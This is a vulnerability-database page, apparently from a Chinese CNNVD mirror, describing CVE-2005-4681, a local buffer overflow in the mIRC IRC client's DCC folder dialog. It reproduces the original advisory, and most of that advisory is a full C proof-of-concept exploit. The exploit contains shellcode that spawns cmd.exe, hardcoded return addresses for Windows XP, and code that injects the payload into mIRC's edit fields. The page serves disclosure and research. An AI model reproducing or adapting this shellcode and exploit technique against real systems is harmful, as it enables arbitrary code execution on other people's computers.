mIRC 缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1196655 漏洞类型 缓冲区溢出
发布时间 2005-12-31 更新时间 2006-09-21
CVE编号 CVE-2005-4681 CNNVD-ID CNNVD-200512-730
漏洞平台 N/A CVSS评分 4.6
|漏洞来源
https://cxsecurity.com/issue/WLB-2005120063
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-730
|漏洞详情
**争议**mIRC5.91、6.03、6.12和6.16的缓冲区溢出使得本地用户可以通过在获得DCCGetFolderDialog之后输入的长字符串来执行任意代码。
|漏洞EXP
- 1 - Introduction

Written by Khaled Mardam-Bey, mIRC is a friendly IRC client that is
well equipped with options and tools.

- 2 - Vulnerability description

Tested on mIRC 6.16,6.12,6.03 and 5.91, all result vulnerable.
Possibly all mIRC versions are vulnerable.
The code executed are with current user privileges,anyway this bug
could be dangerous in universities,
cyber coffees, schools and any location with restrictions.
Adding/editing filters to locate the specified folder for the files
transfered by DCC if insert a string greater
or equal to 981 bytes the application crash showing an memory error 0x0000.
This 0x0000 error it's because shows the value of the second edit
field and it's empty, if write AAAA in this field,
the error it's 0x41414141, overwrite the eip and can take the control
to execute arbitrary code.
To execute code appears a little problem, only can write 39chars in
the second edit, this problem imposibilite insert
a good shellcode, to fix this, can put jmp esp + sub esp 0x74 + jmp
esp, with this, the EIP it's overwrited by the text
in the first edit field, and in this have 980bytes for the shellcode.

- 3 - How to exploit it

This PoC open a cmd.exe,also it's possible execute any other code.

----------- CUT HERE ----------------------
/*
mIRCexploitXPSP2eng.c
Vulnerability tested on Windows XP SP1,SP2 Spanish
and Windows XP SP2 English

This PoC it's for XP SP2 English, for spanish readers:

XP SP1
system: 0x77bf8044
jmp esp: 0x77E29BBB (advapi32.dll)

XP SP2
system: 0x77bf93c7
jmp esp: 0x77E37BBB (advapi32.dll)

Special thanks to rojodos (very great your tutorial),
jocanor, otromasf, crazyking and gandalfj.
*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

int main () {
HWND lHandle, lHandledit, lHandledit2;
char strClass[30];
char shellcode[999]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x55"
"\x8B\xEC"
"\x33\xFF"
"\x57"
"\x83\xEC\x04"
"\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D"
"\xC6\x45\xFA\x64"
"\xC6\x45\xFB\x2E"
"\xC6\x45\xFC\x65"
"\xC6\x45\xFD\x78"
"\xC6\x45\xFE\x65"
"\x8D\x45\xF8"
"\x50"
"\xBB\xc7\x93\xc2\x77"
"\xFF\xD3"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90";

//Shellcode system("cmd.exe"), system in \xc7\x93\xc2\x77 77c293c7
(WinXP Sp2 English)

char saltaoffset[]="\xD6\xD1\xE5\x77\x90\x90\x90\x90\x90\x83\xEC\x74\xFF\xE4\x90\x90";
// jmp esp 0x77E5D1D6 (advapi32.dll) , sub esp 0x74, jmp esp

lHandle=FindWindow(NULL, "DCC Get Folder");

if (!lHandle)
{
printf("\nCan't find mIRC DCC Get Folder Dialog :\nIn mIRC
Options/DCC/Folders push ADD\n");
return 0;
}
else
{ printf("handle for mIRC DCC Get Folder Dialog : 0x%X\n",lHandle); }

SetForegroundWindow(lHandle);
lHandledit = FindWindowEx(lHandle, 0, "Edit", 0);
printf("handle for First Edit : 0x%X\n",lHandledit);
printf("ASCII Shellcode in first edit : %s\n", shellcode);
SendMessage(lHandledit, WM_SETTEXT,0,(LPARAM)shellcode);


lHandledit2 = GetWindow(lHandledit, GW_HWNDNEXT);
GetClassName(lHandledit2, strClass, sizeof(strClass));

while ( lstrcmp(strClass,"Edit") )
{
lHandledit2 = GetWindow(lHandledit2, GW_HWNDNEXT);
GetClassName(lHandledit2, strClass, sizeof(strClass));
}

printf("handle for Second Edit : 0x%X\n",lHandledit2);
Sleep(500);
printf("ASCII Shellcode in second edit : %s\n", saltaoffset);
SendMessage(lHandledit2, WM_SETTEXT,0,(LPARAM)saltaoffset);
Sleep(500);
SendMessage (lHandledit2, WM_IME_KEYDOWN, VK_RETURN, 0);
}

----------- CUT HERE ----------------------


- 4 - Solution

I contacted with khaled in khaled@mirc.com reporting the bug on
29/11/2005 without response.
Contacting again with this advisory.


- 5 - Credits

URL Vendor: www.mirc.com
Author: Jordi Corrales ( crowdat[at]gmail.com )
Date: 09/12/2005

Spanish and English Advisory: http://www.shellsec.net/leer_advisory.php?id=9
Spanish Advisory and Compiled Spanish Exploit:
http://www.cyruxnet.org/mirc616_bug_exploit.htm
|参考资料

来源:MISC
链接:http://www.shellsec.net/leer_advisory.php?id=9
来源:MISC
链接:http://www.packetstormsecurity.org/0512-exploits/mIRCexploitXPSP2eng.c
来源:OSVDB
名称:24116
链接:http://www.osvdb.org/24116
来源:MISC
链接:http://trout.snt.utwente.nl/ubbthreads/showflat.php?Cat=0&Number=146129&an=0&page=0#146129
来源:BUGTRAQ
名称:20051220mIRCbufferoverflow
链接:http://seclists.org/lists/bugtraq/2005/Dec/0263.html
来源:SREASON
名称:285
链接:http://securityreason.com/securityalert/285